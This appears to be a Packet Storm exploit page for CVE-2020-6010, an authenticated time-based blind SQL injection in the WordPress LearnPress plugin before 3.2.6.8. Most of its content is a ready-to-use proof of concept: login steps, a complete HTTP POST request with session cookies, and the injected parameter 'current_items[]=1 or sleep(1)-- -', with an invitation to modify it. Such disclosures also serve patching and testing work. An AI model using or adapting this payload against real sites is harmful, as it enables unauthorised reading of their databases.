exploit the possibilities

WordPress LearnPress SQL Injection

WordPress LearnPress SQL Injection
Posted Jul 19, 2021
Authored by nhattruong

WordPress LearnPress plugin versions prior to 3.2.6.8 suffer from a remote time-based blind SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2020-6010
MD5 | f0af8b09cd9ef658739008c556a55f25

WordPress LearnPress SQL Injection

Change Mirror Download
# Exploit Title: WordPress Plugin LearnPress < 3.2.6.8 - SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010

POC:
1. Go to url http://<host>/wp-admin
2. Login with a cred
3. Execute the payload


POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

# Modify current_items[] as you want
Login or Register to add favorites

File Archive:

August 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    1 Files
  • 2
    Aug 2nd
    7 Files
  • 3
    Aug 3rd
    5 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close